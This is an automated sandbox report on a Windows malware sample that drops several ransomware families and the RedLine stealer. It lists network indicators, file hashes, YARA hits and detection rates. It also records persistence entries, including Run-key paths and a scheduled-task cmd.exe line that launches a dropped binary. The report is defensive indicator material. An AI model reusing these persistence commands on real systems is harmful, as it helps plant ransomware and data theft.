                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.29
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              87.98.178.227
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.79
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.226
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 712619
Start date and time: 2022-09-29 14:48:45 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 31s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: irH9zMhZub.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 67
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Detection: MAL
Classification: mal100.rans.spre.troj.expl.evad.winEXE@123/23@2/100
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 44.7% (good quality ratio 41.1%)
• Quality average: 76.7%
• Quality standard deviation: 30.6%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 167
• Number of non-executed functions: 148
Cookbook Comments:
• Found application associated with file extension: .exe
• Connection to analysis system has been lost, crash info: Unknown
• Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, arizonacode.bplaced.net, powertoolsforyou.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:50:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
14:50:08 | Task Scheduler | Run new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit
14:50:09 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
14:50:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
14:50:23 | API Interceptor | 1x Sleep call for process: Endermanch@Cerber5.exe modified
14:50:32 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe
14:51:27 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\WINDOWS\Web\rundll32.exe
14:52:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AVPCC C:\WINDOWS\Cursors\avp.exe
                                                                                                                                                                              PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 51.75.209.245
                                                                                                                                                                              YVw7dMcj8V.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 51.89.96.41
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.135.247.111
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.135.247.111
                                                                                                                                                                              AjKschI872.elfGet hashmaliciousBrowse
                                                                                                                                                                              • 37.187.104.114
                                                                                                                                                                              SecuriteInfo.com.Trojan.Siggen18.52433.30846.12558.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 158.69.134.53
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.135.247.111
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.135.247.111
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.135.247.111
                                                                                                                                                                              Al Muhaidib Group KSA.Order With our Company Profile.doc.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 178.32.107.120
                                                                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.1293.15096.13658.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.196.141.86
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 5.135.247.111
                                                                                                                                                                              LS5292022.vbsGet hashmaliciousBrowse
                                                                                                                                                                              • 37.59.226.102
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0e4W5dQXszUV.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              05dfb699.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              a29b4832.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              Invoice-OM Telentia-YX20220926A00224.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              MZA1LR0aPA.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              rEwijnQou9.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              ITEM LIST-0090.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              Kqfcaec.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              • 140.82.121.4
Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | 4W5dQXszUV.exe | malicious
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | launcher.exe | malicious
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | gHroyjf6yV.exe | malicious
C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe | 4W5dQXszUV.exe | malicious

Process: C:\Users\user\Desktop\irH9zMhZub.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 441899
Entropy (8bit): 7.891913976230692
Encrypted: false
SSDEEP: 12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
MD5: FBBDC39AF1139AEBBA4DA004475E8839
SHA1: DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
SHA-256: 630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
SHA-512: 74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
Malicious: true
Yara Hits:
• Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 93%
• Antivirus: Metadefender, Detection: 83%
Joe Sandbox View:
• Filename: 4W5dQXszUV.exe, Detection: malicious
• Filename: launcher.exe, Detection: malicious
• Filename: gHroyjf6yV.exe, Detection: malicious

Process: C:\Users\user\Desktop\irH9zMhZub.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 119296
Entropy (8bit): 7.911347099102218
Encrypted: false
SSDEEP: 3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
MD5: 41789C704A0EECFDD0048B4B4193E752
SHA1: FB1E8385691FA3293B7CBFB9B2656CF09F20E722
SHA-256: B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
SHA-512: 76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 86%
• Antivirus: Metadefender, Detection: 78%
Joe Sandbox View:
• Filename: 4W5dQXszUV.exe, Detection: malicious
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):320760
                                                                                                                                                                                      Entropy (8bit):6.315890725389197
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
                                                                                                                                                                                      MD5:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                                                      SHA1:C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
                                                                                                                                                                                      SHA-256:B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
                                                                                                                                                                                      SHA-512:266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 91%
• Antivirus: Metadefender, Detection: 76%
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):495616
                                                                                                                                                                                      Entropy (8bit):6.338057450703654
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
                                                                                                                                                                                      MD5:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                                                      SHA1:01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
                                                                                                                                                                                      SHA-256:4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
                                                                                                                                                                                      SHA-512:2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
• Antivirus: Metadefender, Detection: 69%
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):216064
                                                                                                                                                                                      Entropy (8bit):3.1340875869032985
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
                                                                                                                                                                                      MD5:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                                                      SHA1:7711CB4873E58B7ADCF2A2B047B090E78D10C75B
                                                                                                                                                                                      SHA-256:F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
                                                                                                                                                                                      SHA-512:62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                                                      • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 85%
• Antivirus: Metadefender, Detection: 60%
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):54569
                                                                                                                                                                                      Entropy (8bit):6.640114556707396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
                                                                                                                                                                                      MD5:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                                                                                                      SHA1:213E6624BFF6064C016B9CDC15D5365823C01F5F
                                                                                                                                                                                      SHA-256:E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
                                                                                                                                                                                      SHA-512:A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 96%
• Antivirus: Metadefender, Detection: 86%
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1427968
                                                                                                                                                                                      Entropy (8bit):6.856188310924527
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                                                                                                      MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                                                      SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                                                                                                      SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                                                                                                      SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 91%
• Antivirus: Metadefender, Detection: 72%
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):267776
                                                                                                                                                                                      Entropy (8bit):7.535290233283343
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
                                                                                                                                                                                      MD5:7D80230DF68CCBA871815D68F016C282
                                                                                                                                                                                      SHA1:E10874C6108A26CEEDFC84F50881824462B5B6B6
                                                                                                                                                                                      SHA-256:F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
                                                                                                                                                                                      SHA-512:64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, Author: Joe Security
                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, Author: ditekSHen
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
• Antivirus: Metadefender, Detection: 66%
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines (344), with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):344
                                                                                                                                                                                      Entropy (8bit):5.892654865294319
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:rQ3AzJ1/YR/juoQtqFFihGjc/+sbzPLaMx8XNuigFv1x1:ryAsRaoiqFFihG4Hzx8XNhgFv1x1
                                                                                                                                                                                      MD5:12F2EF4BB826DDEA525D202587F0FFAD
                                                                                                                                                                                      SHA1:6B7863178B3DAD686653934B5EA910F709ECDFB2
                                                                                                                                                                                      SHA-256:F7A8246BF53AF8BFFBCEF692273E63C70869F9001382B09C58462020AD94FBCB
                                                                                                                                                                                      SHA-512:9CC4C1B46697B52A579ADEACBB1E328495935DDDA013492A5C9C1035407EAA607E8BA20BD52877E6E2A97787E2AA2E823F03466A1E866AF321C1FDFD38A0D024
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                      File Type:b.out separate pure segmented object file V2.3 V3.0 86 Large Text Large Data Huge Objects Enabled
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                      Entropy (8bit):6.4258380051697275
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Tlp32CzfLxBQvtezbBFvvuIMnPIYjmfkX4ocjXouRXDDP:mCYFsttMPIGXNGoutXP
                                                                                                                                                                                      MD5:02679D4C284AF99A12D9B094D6ABEA49
                                                                                                                                                                                      SHA1:AF57AB02DBDBFA3C813F1A8D3ABA4114DC2598EC
                                                                                                                                                                                      SHA-256:106DB8788633352E1892F0B50D0F91EF83685703C82B2A4CA11974BFDA7967BA
                                                                                                                                                                                      SHA-512:994DBFD0907909C1E41D4064EA0845E0ACE5A6B963A088ECA29E2D36CA906126CBDAAC906A40C37BC07A0C82B8AD3159C7FC14E6FF085C643C34995C2EED1714
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):402632
                                                                                                                                                                                      Entropy (8bit):7.999545291816681
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
                                                                                                                                                                                      MD5:61DA9939DB42E2C3007ECE3F163E2D06
                                                                                                                                                                                      SHA1:4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
                                                                                                                                                                                      SHA-256:EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
                                                                                                                                                                                      SHA-512:14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):116134
                                                                                                                                                                                      Entropy (8bit):7.998443688728203
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
                                                                                                                                                                                      MD5:6CA327B67F1A2B2A4FBB7F342E15E7BF
                                                                                                                                                                                      SHA1:AAB4A7D8199E8416AD8649FEDE35B846FC96F082
                                                                                                                                                                                      SHA-256:460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
                                                                                                                                                                                      SHA-512:B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):185620
                                                                                                                                                                                      Entropy (8bit):7.999024397332973
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
                                                                                                                                                                                      MD5:10D74DE972A374BB9B35944901556F5F
                                                                                                                                                                                      SHA1:593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
                                                                                                                                                                                      SHA-256:AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
                                                                                                                                                                                      SHA-512:1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):215551
                                                                                                                                                                                      Entropy (8bit):7.999084540418597
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
                                                                                                                                                                                      MD5:016D1CA76D387EC75A64C6EB3DAC9DD9
                                                                                                                                                                                      SHA1:B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
                                                                                                                                                                                      SHA-256:8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
                                                                                                                                                                                      SHA-512:F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):203087
                                                                                                                                                                                      Entropy (8bit):7.998965133479219
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
                                                                                                                                                                                      MD5:3500896B86E96031CF27527CB2BBCE40
                                                                                                                                                                                      SHA1:77AD023A9EA211FA01413ECD3033773698168A9C
                                                                                                                                                                                      SHA-256:7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
                                                                                                                                                                                      SHA-512:3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34300
                                                                                                                                                                                      Entropy (8bit):7.994524271759185
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
                                                                                                                                                                                      MD5:5569BFE4F06724DD750C2A4690B79BA0
                                                                                                                                                                                      SHA1:05414C7D5DACF43370AB451D28D4AC27BDCABF22
                                                                                                                                                                                      SHA-256:CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
                                                                                                                                                                                      SHA-512:775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26359
                                                                                                                                                                                      Entropy (8bit):7.99208020012939
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
                                                                                                                                                                                      MD5:1AEA5AD85DF3B14E216CC0200C708673
                                                                                                                                                                                      SHA1:E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
                                                                                                                                                                                      SHA-256:8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
                                                                                                                                                                                      SHA-512:06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:PK..3...c...8..../f..).......Endermanch@Krotten.exe...
                                                                                                                                                                                      Process:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
